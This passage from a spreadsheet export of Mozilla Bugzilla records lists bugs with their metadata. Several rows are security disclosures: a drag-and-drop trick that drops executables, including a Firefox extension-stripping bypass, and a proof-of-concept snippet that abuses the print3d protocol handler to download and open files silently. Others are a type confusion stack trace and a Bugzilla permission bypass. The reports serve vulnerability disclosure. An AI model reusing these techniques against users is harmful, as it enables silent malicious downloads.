      <c r="P3351" t="inlineStr">
        <is>
          <t>Disclosure planned by EOY 2013, Chrome bug public now [adv-main102+]</t>
        </is>
      </c>
      <c r="Q3351" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3351" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3351" t="inlineStr">
        <is>
          <t>102 Branch</t>
        </is>
      </c>
      <c r="T3351" t="n">
        <v>1</v>
      </c>
      <c r="U3351" t="n">
        <v>0</v>
      </c>
      <c r="V3351" t="n">
        <v>10</v>
      </c>
      <c r="W3351" t="inlineStr">
        <is>
          <t>Date: Wed, 27 Feb 2013 09:13:37 -0800 (PST)
From: Attila SUSZTER &lt;asuszter@yahoo.com&gt;
Subject: Re: [BTS] Drag-and-Drop and File Extension Bugs Enable Opera to Drop
	Malicious File
To: "DSK-383008@bugs.opera.com" &lt;DSK-383008@bugs.opera.com&gt;
-----//-----
Hi,
[CC-ed Mozilla and Google security teams]
Thanks for the additional information, and for the quick response.
Google tracks this issue at https://code.google.com/p/chromium/issues/detail?id=177980 Even though the impact their side seems to be lower probably would be good to coordinate with them, too.
Attila
    From: "DSK-383008@bugs.opera.com" &lt;DSK-383008@bugs.opera.com&gt;
    To: asuszter@yahoo.com
    Sent: Wednesday, 27 February 2013, 14:12
    Subject: [BTS] Drag-and-Drop and File Extension Bugs Enable Opera to Drop Malicious File
    Hi,
    Thanks for your bug report; Drag-and-Drop and File Extension Bugs Enable Opera to Drop Malicious File
    We can reproduce the issue, and will look into how to get it fixed in a public release as soon as possible. In order to protect users from abuse, we ask that you refrain from publicising the issue until we have had a chance to fix it.
    The fault lies in Opera trusting the filename supplied by the page, instead of applying the appropriate filename for the file's mimetype. Note, however, that the dnd API allows a page to supply any data and any mimetype, while also allowing a custom drag image to be displayed. This would allow actual executables to be added as the drag data, and these could then be dragged to the system from any browser that supports the HTML5 dnd API, while making the user think they were dragging an image.
    Other browsers do try to protect against this by removing the harmful extensions, but while investigating your bug report, we discovered that this protection could be bypassed in Firefox (image.jpg.exe.exe will become image.jpg.exe). We will inform Mozilla of this issue, and coordinate our announcement with them. We would ask that you also refrain from announcing until both we and Mozilla have had a chance to fix this issue.
    For more information regarding Opera's security policies, you may look at the following links:
    http://www.opera.com/security/policy/
    http://www.opera.com/security/rating/
    http://my.opera.com/securitygroup/blog/2010/02/18/what-is-a-browser-security-issue-anyway
    Thanks again for your report.
    Tarquin Wilton-Jones
    Security Group
    Opera Software ASA
    Reply to this e-mail to respond to the query.</t>
        </is>
      </c>
      <c r="X3351" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3352">
      <c r="A3352" t="n">
        <v>1014224</v>
      </c>
      <c r="B3352" t="inlineStr">
        <is>
          <t>2014-05-21 14:05:06 -0700</t>
        </is>
      </c>
      <c r="C3352" t="inlineStr">
        <is>
          <t>[Blocker] Loop-Server repo is using a down-rev version of Loads</t>
        </is>
      </c>
      <c r="D3352" t="inlineStr">
        <is>
          <t>2014-05-22 10:36:08 -0700</t>
        </is>
      </c>
      <c r="E3352" t="n">
        <v>1</v>
      </c>
      <c r="F3352" t="n">
        <v>1</v>
      </c>
      <c r="G3352" t="n">
        <v>6</v>
      </c>
      <c r="H3352" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3352" t="inlineStr">
        <is>
          <t>Hello (Loop)</t>
        </is>
      </c>
      <c r="J3352" t="inlineStr">
        <is>
          <t>Server</t>
        </is>
      </c>
      <c r="K3352" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3352" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3352" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3352" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3352" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3352" t="inlineStr">
        <is>
          <t>[qa+]</t>
        </is>
      </c>
      <c r="Q3352" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3352" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3352" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3352" t="n">
        <v>1</v>
      </c>
      <c r="U3352" t="n">
        <v>0</v>
      </c>
      <c r="V3352" t="n">
        <v>9</v>
      </c>
      <c r="W3352" t="inlineStr">
        <is>
          <t>./bin/loads-runner --version
0.2
That version does not support the following required options:
--user-id
--ssh
The loads cluster is running the new version and expects, as a minimum, the -ssh option for security reasons.</t>
        </is>
      </c>
      <c r="X3352" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3353">
      <c r="A3353" t="n">
        <v>1792138</v>
      </c>
      <c r="B3353" t="inlineStr">
        <is>
          <t>2022-09-22 22:39:18 -0700</t>
        </is>
      </c>
      <c r="C3353" t="inlineStr">
        <is>
          <t>Extensions are not prompted before opening external schemes, leading to security issues</t>
        </is>
      </c>
      <c r="D3353" t="inlineStr">
        <is>
          <t>2024-05-30 11:00:51 -0700</t>
        </is>
      </c>
      <c r="E3353" t="n">
        <v>1</v>
      </c>
      <c r="F3353" t="n">
        <v>1</v>
      </c>
      <c r="G3353" t="n">
        <v>2</v>
      </c>
      <c r="H3353" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3353" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3353" t="inlineStr">
        <is>
          <t>File Handling</t>
        </is>
      </c>
      <c r="K3353" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3353" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3353" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3353" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3353" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3353" t="inlineStr">
        <is>
          <t>[reporter-external] [web-bounty-form] [verif?][post-critsmash-triage][adv-main110+][adv-esr102.8+]</t>
        </is>
      </c>
      <c r="Q3353" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3353" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S3353" t="inlineStr">
        <is>
          <t>110 Branch</t>
        </is>
      </c>
      <c r="T3353" t="n">
        <v>1</v>
      </c>
      <c r="U3353" t="n">
        <v>0</v>
      </c>
      <c r="V3353" t="n">
        <v>62</v>
      </c>
      <c r="W3353" t="inlineStr">
        <is>
          <t>Created attachment 9295918
Mozilla Add-on to desmontrate the attack
VERSION
Firefox Version: 105.0 (64-bits)
Operating System: Windows 10 Pro Version 21H1 (Build 19043.2006)
VULNERABILITY DETAILS
This report covers an extension who could abuse default protocol handlers acceptance from the browser
to download any arbitrary file and tries to load with a windows default installed program.
Impact:
An extension can create an `obscured` window using the protocol print3d (default accepted by firefox), which
leads to the user downloading any type of files from an URL to the system and try to load this file using print3d software on Windows.
Here in this report, I'm covering the usage of the print3d protocol as an example but it could leave a door open for many more cases.
The extension can run things for the user anytime, from user clicks, user installed actionss and many more events, so i'm using this as example.
In this report I'm gonna use the extension to inject code on the DOM with a custom event and when this
custom event is called, the content.js file sends a message to the background.js which opens an minimal window
with the protocol handler and closes itself right after, obscuring what is causing this to download files and
the program on windows popup trying to load this file.
Impact: Downloading any type of files without the user awareness and possible load/execution of arbitrary code on users' systems or allow access to users' confidential information if the attacker goes further on the protocol to microsoft program which the Firefox accept as default and Chrome does't.
This protocol is not handled by Chrome because security issues too;
My example was just to demonstrate it can be obscured and abuse this or other cases with protocol handlers but it could be as simple as:
browser.action.onClicked.addListener(async () =&gt; {'
  let window = await chrome.windows.create({url: "com.microsoft.print3d://https://github.com/git-for-windows/git/releases/download/v2.37.3.windows.1/Git-2.37.3-64-bit.exe"});
});
or
window.location.replace("com.microsoft.print3d://https://github.com/git-for-windows/git/releases/download/v2.37.3.windows.1/Git-2.37.3-64-bit.exe")
You can see the download file at:
Mitigation: Avoid the protocol handler com.microsoft.print3d as default accepted
REPRODUCTION CASE
1. Install the attached extension, the extension does not require any permission;
- about:debugging#/runtime/this-firefox
- Load temporary extension
2. Visit any page;
3. Once the extension reveals the new window, observe the interaction;
4. The user downloaded a file and tried to load it without consent;
Ps.: We could just not use the add-on the place on the site and use window.location.replace of something else
CREDIT INFORMATION
Reporter credit: Vitor Torres &lt;https://github.com/vtorres/ or vitortorresvt@gmail.com&gt;</t>
        </is>
      </c>
      <c r="X3353" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3354">
      <c r="A3354" t="n">
        <v>811536</v>
      </c>
      <c r="B3354" t="inlineStr">
        <is>
          <t>2012-11-13 16:12:28 -0800</t>
        </is>
      </c>
      <c r="C3354" t="inlineStr">
        <is>
          <t>Home screen application has died and will not restart/come back</t>
        </is>
      </c>
      <c r="D3354" t="inlineStr">
        <is>
          <t>2013-03-12 08:23:31 -0700</t>
        </is>
      </c>
      <c r="E3354" t="n">
        <v>1</v>
      </c>
      <c r="F3354" t="n">
        <v>1</v>
      </c>
      <c r="G3354" t="n">
        <v>6</v>
      </c>
      <c r="H3354" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3354" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J3354" t="inlineStr">
        <is>
          <t>Gaia</t>
        </is>
      </c>
      <c r="K3354" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3354" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3354" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3354" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3354" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3354" t="inlineStr"/>
      <c r="Q3354" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3354" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3354" t="inlineStr">
        <is>
          <t>B2G C2 (20nov-10dec)</t>
        </is>
      </c>
      <c r="T3354" t="n">
        <v>1</v>
      </c>
      <c r="U3354" t="n">
        <v>0</v>
      </c>
      <c r="V3354" t="n">
        <v>33</v>
      </c>
      <c r="W3354" t="inlineStr">
        <is>
          <t>Earlier today, I removed some marketplace apps (stocks, daily express, etc) and changed my background. Mid-way through the process of deleting apps, the phone locked up and would no longer respond. I rebooted the phone but now when I reboot the phone I do see the unlock screen, however when I unlock the phone, I get a background, but no applications.
- Hitting the "Home" button drops me to the "The app is having problems" page.
- phone calls in work as expected, I am unable to access the phone functions to make outbound calls
- From the lock screen, the camera *does* work.
- removing the Tmobile SIM card and rebooting has no effect
Unfortunately, I can't see what build/rev I'm running. I have device 12984.</t>
        </is>
      </c>
      <c r="X3354" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3355">
      <c r="A3355" t="n">
        <v>627317</v>
      </c>
      <c r="B3355" t="inlineStr">
        <is>
          <t>2011-01-20 02:44:41 -0800</t>
        </is>
      </c>
      <c r="C3355" t="inlineStr">
        <is>
          <t>Post "updates" builders should be run automatically in pre-production</t>
        </is>
      </c>
      <c r="D3355" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E3355" t="n">
        <v>1</v>
      </c>
      <c r="F3355" t="n">
        <v>1</v>
      </c>
      <c r="G3355" t="n">
        <v>5</v>
      </c>
      <c r="H3355" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3355" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3355" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3355" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3355" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3355" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3355" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3355" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3355" t="inlineStr">
        <is>
          <t>[releases][preproduction]</t>
        </is>
      </c>
      <c r="Q3355" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3355" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3355" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3355" t="n">
        <v>1</v>
      </c>
      <c r="U3355" t="n">
        <v>0</v>
      </c>
      <c r="V3355" t="n">
        <v>7</v>
      </c>
      <c r="W3355" t="inlineStr">
        <is>
          <t>At the moment all builders up to pre_push_to_mirrors are being run without forcing any builders (singing is external process, should be fixed by bug 627312).
To make pre-production releases automatic from the beginning to the end we should run the following builders automatically:
* pre_push_to_mirrors. Could be fired after update_verify is finished
* push_to_mirrors. Could be triggered by pre_push_to_mirrors
* bouncer_submitter. Could be triggered by any builder. We can use staging Tuxedo/Bouncer.
* push snippets to the beta/release channel (bug 594930). Could be triggered by push_to_mirrors or mirror uptake monitoring.</t>
        </is>
      </c>
      <c r="X3355" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3356">
      <c r="A3356" t="n">
        <v>1142210</v>
      </c>
      <c r="B3356" t="inlineStr">
        <is>
          <t>2015-03-11 12:23:50 -0700</t>
        </is>
      </c>
      <c r="C3356" t="inlineStr">
        <is>
          <t>Type Confusion mozilla::dom::indexedDB::IndexedDatabaseManager::CommonPostHandleEvent</t>
        </is>
      </c>
      <c r="D3356" t="inlineStr">
        <is>
          <t>2024-05-30 08:40:19 -0700</t>
        </is>
      </c>
      <c r="E3356" t="n">
        <v>1</v>
      </c>
      <c r="F3356" t="n">
        <v>1</v>
      </c>
      <c r="G3356" t="n">
        <v>3</v>
      </c>
      <c r="H3356" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3356" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3356" t="inlineStr">
        <is>
          <t>Storage: IndexedDB</t>
        </is>
      </c>
      <c r="K3356" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3356" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3356" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3356" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3356" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3356" t="inlineStr">
        <is>
          <t>[adv-main39+][adv-esr38.1+][adv-esr31.8+]</t>
        </is>
      </c>
      <c r="Q3356" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3356" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3356" t="inlineStr">
        <is>
          <t>mozilla39</t>
        </is>
      </c>
      <c r="T3356" t="n">
        <v>1</v>
      </c>
      <c r="U3356" t="n">
        <v>0</v>
      </c>
      <c r="V3356" t="n">
        <v>35</v>
      </c>
      <c r="W3356" t="inlineStr">
        <is>
          <t>Created attachment 8576180
testevent2.html
User Agent: Opera/9.80 (X11; Linux x86_64) Presto/2.12.388 Version/12.16
Steps to reproduce:
Run file
Actual results:
I looked at it on debug build it seems to cast an IDBDatabase object to IDBRequest, then checks IDBRequest::mOwningThread equals current thread, but actually reads from database object. That's why I put type confusion, only had a quick look though.
#0  mozilla::dom::indexedDB::IDBRequest::AssertIsOnOwningThread (this=&lt;optimized out&gt;)
    at /builds/slave/m-beta-l64-asan-d-000000000000/build/dom/indexedDB/IDBRequest.cpp:72
#1  0x00007fffe8866bce in mozilla::dom::indexedDB::IDBRequest::GetErrorAfterResult (this=0x612000528f40)
    at /builds/slave/m-beta-l64-asan-d-000000000000/build/dom/indexedDB/IDBRequest.cpp:259
#2  0x00007fffe887da17 in mozilla::dom::indexedDB::IndexedDatabaseManager::CommonPostHandleEvent (aEventTarget=&lt;optimized out&gt;, aFactory=&lt;optimized out&gt;, 
    aVisitor=...) at /builds/slave/m-beta-l64-asan-d-000000000000/build/dom/indexedDB/IndexedDatabaseManager.cpp:406
#3  0x00007fffe88475e4 in mozilla::dom::indexedDB::IDBDatabase::PostHandleEvent (this=0x612000528f40, aVisitor=...)
    at /builds/slave/m-beta-l64-asan-d-000000000000/build/dom/indexedDB/IDBDatabase.cpp:1339
#4  0x00007fffe7fefd0a in mozilla::EventTargetChainItem::HandleEventTargetChain (aChain=..., aVisitor=..., aCallback=&lt;optimized out&gt;, aCd=...)
    at /builds/slave/m-beta-l64-asan-d-000000000000/build/dom/events/EventDispatcher.cpp:302
#5  0x00007fffe7ff01fc in mozilla::EventTargetChainItem::HandleEventTargetChain (aChain=..., aVisitor=..., aCallback=&lt;optimized out&gt;, aCd=...)
    at /builds/slave/m-beta-l64-asan-d-000000000000/build/dom/events/EventDispatcher.cpp:348
#6  0x00007fffe7ff1d54 in mozilla::EventDispatcher::Dispatch (aTarget=&lt;optimized out&gt;, aPresContext=&lt;optimized out&gt;, aEvent=&lt;optimized out&gt;, 
    aDOMEvent=&lt;optimized out&gt;, aEventStatus=&lt;optimized out&gt;, aCallback=&lt;optimized out&gt;, aTargets=&lt;optimized out&gt;)
    at /builds/slave/m-beta-l64-asan-d-000000000000/build/dom/events/EventDispatcher.cpp:633
#7  0x00007fffe7fcd5dc in mozilla::EventDispatcher::DispatchDOMEvent (aTarget=&lt;optimized out&gt;, aEvent=&lt;optimized out&gt;, aDOMEvent=0x608000382e20, 
    aPresContext=&lt;optimized out&gt;, aEventStatus=&lt;optimized out&gt;) at /builds/slave/m-beta-l64-asan-d-000000000000/build/dom/events/EventDispatcher.cpp:697
#8  0x00007fffe7fdc9da in mozilla::DOMEventTargetHelper::DispatchEvent (this=0x612000528f40, aEvent=0x608000382e20, aRetVal=0x7fffffff6540)
    at /builds/slave/m-beta-l64-asan-d-000000000000/build/dom/events/DOMEventTargetHelper.cpp:248
#9  0x00007fffe6df1a3b in mozilla::dom::EventTarget::DispatchEvent (this=0x612000528f40, aEvent=..., aRv=...)
    at /builds/slave/m-beta-l64-asan-d-000000000000/build/dom/base/nsINode.cpp:2722
#10 0x00007fffe72ce35c in mozilla::dom::EventTargetBinding::dispatchEvent (cx=&lt;optimized out&gt;, self=&lt;optimized out&gt;, args=..., obj=...)
    at ./EventTargetBinding.cpp:164
#11 0x00007fffe72cddec in mozilla::dom::EventTargetBinding::genericMethod (cx=&lt;optimized out&gt;, argc=&lt;optimized out&gt;, vp=&lt;optimized out&gt;)
    at ./EventTargetBinding.cpp:342
#12 0x00007fffeba9b526 in js::CallJSNative (cx=&lt;optimized out&gt;, native=&lt;optimized out&gt;, args=...)
    at /builds/slave/m-beta-l64-asan-d-000000000000/build/js/src/jscntxtinlines.h:227
#13 0x00007fffeba66083 in js::Invoke (cx=&lt;optimized out&gt;, args=..., construct=&lt;optimized out&gt;)
    at /builds/slave/m-beta-l64-asan-d-000000000000/build/js/src/vm/Interpreter.cpp:498
#14 0x00007fffeba9101b in Interpret (cx=0x614000252240, state=...) at /builds/slave/m-beta-l64-asan-d-000000000000/build/js/src/vm/Interpreter.cpp:2556
#15 0x00007fffeba8256c in js::RunScript (cx=&lt;optimized out&gt;, state=...) at /builds/slave/m-beta-l64-asan-d-000000000000/build/js/src/vm/Interpreter.cpp:448
#16 0x00007fffeba661fe in js::Invoke (cx=&lt;optimized out&gt;, args=..., construct=&lt;optimized out&gt;)
    at /builds/slave/m-beta-l64-asan-d-000000000000/build/js/src/vm/Interpreter.cpp:517
#17 0x00007fffeba9bac5 in js::Invoke (cx=0x614000252240, thisv=..., fval=..., argc=&lt;optimized out&gt;, argv=&lt;optimized out&gt;, rval=...)
    at /builds/slave/m-beta-l64-asan-d-000000000000/build/js/src/vm/Interpreter.cpp:554
#18 0x00007fffeb785c92 in JS::Call (cx=0x614000252240, args=..., thisv=..., fval=..., rval=...)
    at /builds/slave/m-beta-l64-asan-d-000000000000/build/js/src/jsapi.cpp:4564
#19 0x00007fffe735e40f in mozilla::dom::Function::Call (this=&lt;optimized out&gt;, cx=0x614000252240, arguments=..., aRv=..., aThisVal=..., aRetVal=...)
    at ./FunctionBinding.cpp:35
#20 0x00007fffe6b4e6bf in mozilla::dom::Function::Call&lt;nsCOMPtr&lt;nsISupports&gt; &gt; (this=&lt;optimized out&gt;, thisObjPtr=..., arguments=..., aRv=..., 
    aExceptionHandling=&lt;optimized out&gt;, aRetVal=...) at ../../dist/include/mozilla/dom/FunctionBinding.h:58
#21 0x00007fffe6b4dcbb in nsGlobalWindow::RunTimeoutHandler (this=&lt;optimized out&gt;, aTimeout=&lt;optimized out&gt;, aScx=&lt;optimized out&gt;)
    at /builds/slave/m-beta-l64-asan-d-000000000000/build/dom/base/nsGlobalWindow.cpp:12261
#22 0x00007fffe6b35034 in nsGlobalWindow::RunTimeout (this=&lt;optimized out&gt;, aTimeout=&lt;optimized out&gt;)
    at /builds/slave/m-beta-l64-asan-d-000000000000/build/dom/base/nsGlobalWindow.cpp:12485
#23 0x00007fffe6b4d24a in nsGlobalWindow::TimerCallback (aClosure=&lt;optimized out&gt;, aTimer=&lt;optimized out&gt;)
    at /builds/slave/m-beta-l64-asan-d-000000000000/build/dom/base/nsGlobalWindow.cpp:12732
#24 0x00007fffe534472a in nsTimerImpl::Fire (this=&lt;optimized out&gt;) at /builds/slave/m-beta-l64-asan-d-000000000000/build/xpcom/threads/nsTimerImpl.cpp:631
#25 0x00007fffe53450cf in nsTimerEvent::Run (this=&lt;optimized out&gt;) at /builds/slave/m-beta-l64-asan-d-000000000000/build/xpcom/threads/nsTimerImpl.cpp:724
#26 0x00007fffe533c16b in nsThread::ProcessNextEvent (this=&lt;optimized out&gt;, aMayWait=&lt;optimized out&gt;, aResult=&lt;optimized out&gt;)
    at /builds/slave/m-beta-l64-asan-d-000000000000/build/xpcom/threads/nsThread.cpp:855
#27 0x00007fffe539dbcf in NS_ProcessNextEvent (aThread=&lt;optimized out&gt;, aMayWait=false)
    at /builds/slave/m-beta-l64-asan-d-000000000000/build/xpcom/glue/nsThreadUtils.cpp:265
#28 0x00007fffe5af76fe in mozilla::ipc::MessagePump::Run (this=&lt;optimized out&gt;, aDelegate=&lt;optimized out&gt;)
    at /builds/slave/m-beta-l64-asan-d-000000000000/build/ipc/glue/MessagePump.cpp:99
#29 0x00007fffe5a948e2 in MessageLoop::RunInternal (this=&lt;optimized out&gt;)
    at /builds/slave/m-beta-l64-asan-d-000000000000/build/ipc/chromium/src/base/message_loop.cc:233
#30 0x00007fffe5a94789 in MessageLoop::Run (this=0x61400002ee40)
    at /builds/slave/m-beta-l64-asan-d-000000000000/build/ipc/chromium/src/base/message_loop.cc:200
#31 0x00007fffe8c9c107 in nsBaseAppShell::Run (this=&lt;optimized out&gt;) at /builds/slave/m-beta-l64-asan-d-000000000000/build/widget/nsBaseAppShell.cpp:164
#32 0x00007fffea00f0c6 in nsAppStartup::Run (this=0x6070000269e0)
    at /builds/slave/m-beta-l64-asan-d-000000000000/build/toolkit/components/startup/nsAppStartup.cpp:281
#33 0x00007fffea0cbbbd in XREMain::XRE_mainRun (this=&lt;optimized out&gt;) at /builds/slave/m-beta-l64-asan-d-000000000000/build/toolkit/xre/nsAppRunner.cpp:4141
#34 0x00007fffea0ccd41 in XREMain::XRE_main (this=0x7fffffffc580, argc=&lt;optimized out&gt;, argv=&lt;optimized out&gt;, aAppData=&lt;optimized out&gt;)
    at /builds/slave/m-beta-l64-asan-d-000000000000/build/toolkit/xre/nsAppRunner.cpp:4217
#35 0x00007fffea0cd7d3 in XRE_main (argc=1, argv=0x7fffffffde58, aAppData=&lt;optimized out&gt;, aFlags=&lt;optimized out&gt;)
    at /builds/slave/m-beta-l64-asan-d-000000000000/build/toolkit/xre/nsAppRunner.cpp:4437
#36 0x000000000048c251 in do_main (argc=&lt;optimized out&gt;, argv=&lt;optimized out&gt;, xreDirectory=&lt;optimized out&gt;)
    at /builds/slave/m-beta-l64-asan-d-000000000000/build/browser/app/nsBrowserApp.cpp:292
#37 0x000000000048b7d2 in main (argc=1, argv=0x7ffff6f91a20 &lt;_IO_stdfile_2_lock&gt;)
    at /builds/slave/m-beta-l64-asan-d-000000000000/build/browser/app/nsBrowserApp.cpp:661
Expected results:
.</t>
        </is>
      </c>
      <c r="X3356" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3357">
      <c r="A3357" t="n">
        <v>620704</v>
      </c>
      <c r="B3357" t="inlineStr">
        <is>
          <t>2010-12-21 09:29:32 -0800</t>
        </is>
      </c>
      <c r="C3357" t="inlineStr">
        <is>
          <t>Speed Up First Run and What's New pages</t>
        </is>
      </c>
      <c r="D3357" t="inlineStr">
        <is>
          <t>2012-08-23 00:16:07 -0700</t>
        </is>
      </c>
      <c r="E3357" t="n">
        <v>1</v>
      </c>
      <c r="F3357" t="n">
        <v>1</v>
      </c>
      <c r="G3357" t="n">
        <v>5</v>
      </c>
      <c r="H3357" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3357" t="inlineStr">
        <is>
          <t>www.mozilla.org</t>
        </is>
      </c>
      <c r="J3357" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3357" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3357" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3357" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3357" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3357" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3357" t="inlineStr"/>
      <c r="Q3357" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3357" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3357" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="T3357" t="n">
        <v>1</v>
      </c>
      <c r="U3357" t="n">
        <v>0</v>
      </c>
      <c r="V3357" t="n">
        <v>9</v>
      </c>
      <c r="W3357" t="inlineStr">
        <is>
          <t>With the release of the redesign, those pages got better than the baseline but they do not contain all the improvements from bug 589315.</t>
        </is>
      </c>
      <c r="X3357" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3358">
      <c r="A3358" t="n">
        <v>39527</v>
      </c>
      <c r="B3358" t="inlineStr">
        <is>
          <t>2000-05-16 17:06:42 -0700</t>
        </is>
      </c>
      <c r="C3358" t="inlineStr">
        <is>
          <t>showvotes.cgi doesn't check viewing permissions</t>
        </is>
      </c>
      <c r="D3358" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:22 -0800</t>
        </is>
      </c>
      <c r="E3358" t="n">
        <v>1</v>
      </c>
      <c r="F3358" t="n">
        <v>1</v>
      </c>
      <c r="G3358" t="n">
        <v>4</v>
      </c>
      <c r="H3358" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3358" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3358" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K3358" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3358" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M3358" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="N3358" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3358" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3358" t="inlineStr">
        <is>
          <t>security</t>
        </is>
      </c>
      <c r="Q3358" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R3358" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3358" t="inlineStr">
        <is>
          <t>Bugzilla 2.14</t>
        </is>
      </c>
      <c r="T3358" t="n">
        <v>1</v>
      </c>
      <c r="U3358" t="n">
        <v>0</v>
      </c>
      <c r="V3358" t="n">
        <v>8</v>
      </c>
      <c r="W3358" t="inlineStr">
        <is>
          <t>http://bugzilla.mozilla.org/show_bug.cgi?id=28698 gives "permission denied".
http://bugzilla.mozilla.org/showvotes.cgi?voteon=28698 shows me the summary.</t>
        </is>
      </c>
      <c r="X3358" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3359">
      <c r="A3359" t="n">
        <v>35935</v>
      </c>
      <c r="B3359" t="inlineStr">
        <is>
          <t>2000-04-14 23:37:56 -0700</t>
        </is>
      </c>
      <c r="C3359" t="inlineStr">
        <is>
          <t>{ib} Invisible paragraphs in spans with CSS relative positioning</t>
        </is>
      </c>
      <c r="D3359" t="inlineStr">
        <is>
          <t>2001-09-05 10:48:37 -0700</t>
        </is>
      </c>
      <c r="E3359" t="n">
        <v>1</v>
      </c>
      <c r="F3359" t="n">
        <v>1</v>
      </c>
      <c r="G3359" t="n">
        <v>3</v>
      </c>
      <c r="H3359" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3359" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3359" t="inlineStr">
        <is>
